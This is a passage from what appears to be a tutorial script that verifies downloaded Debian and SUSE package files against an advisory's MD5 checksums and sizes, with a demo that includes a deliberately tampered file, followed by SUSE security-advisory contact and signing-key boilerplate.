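    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_directory(advisory_text, directory):
    """Return {basename: "ok" | "missing" | "size mismatch" | "MD5 MISMATCH"}."""
    results = {}
    for name, (md5, size) in parse_checksums(advisory_text).items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "missing"
        elif size is not None and os.path.getsize(path) != size:
            results[name] = "size mismatch"   # cheap check before hashing
        elif md5_of_file(path) != md5:
            results[name] = "MD5 MISMATCH"
        else:
            results[name] = "ok"
    return results


def run_demo():
    """Constructed sample: dummy package files plus an advisory excerpt whose
    sums are computed from them. One file is tampered with, one is absent."""
    d = tempfile.mkdtemp()
    good = b"constructed gzip rpm payload"
    deb = b"constructed kernel-patch deb payload"
    with open(os.path.join(d, "gzip-1.3.5-159.5.i586.rpm"), "wb") as f:
        f.write(good)
    with open(os.path.join(d, "kernel-patch-2.6.8-s390_2.6.8-5sarge5_all.deb"), "wb") as f:
        f.write(deb)
    with open(os.path.join(d, "gzip-1.3.5-159.5.x86_64.rpm"), "wb") as f:
        f.write(good + b"\x00")   # tampered: one byte appended
    advisory = f"""
    http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-patch-2.6.8-s390_2.6.8-5sarge5_all.deb
      Size/MD5 checksum:    {len(deb)} {hashlib.md5(deb).hexdigest()}

SUSE LINUX 10.1:

ftp://ftp.suse.com/pub/suse/update/10.1/rpm/i586/gzip-1.3.5-159.5.i586.rpm

{hashlib.md5(good).hexdigest()}

ftp://ftp.suse.com/pub/suse/update/10.1/rpm/x86_64/gzip-1.3.5-159.5.x86_64.rpm

{hashlib.md5(good).hexdigest()}

ftp://ftp.suse.com/pub/suse/update/10.1/rpm/ppc/gzip-1.3.5-159.5.ppc.rpm

{hashlib.md5(good).hexdigest()}
"""
    return verify_directory(advisory, d)


if __name__ == "__main__":
    for name, status in sorted(run_demo().items()):
        print(f"{status:14} {name}")
```

In real use, paste the signed announcement (after gpg --verify succeeds) into advisory_text and point directory at the download location; anything other than "ok" means the file should not be installed.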

For general information or the frequently asked questions (FAQ),
send mail to <[email protected]>
or <[email protected]>.


SUSE’s security contact is <[email protected]> or
<[email protected]>. The
<[email protected]>
public key is listed below.


The information in this advisory may be distributed or
reproduced, provided that the advisory is not modified in any way.
In particular, the clear text signature should show proof of the
authenticity of the text.

SUSE Linux Products GmbH provides no warranties of any kind
whatsoever with respect to the information contained in this
security advisory.

Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <[email protected]>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <[email protected]>
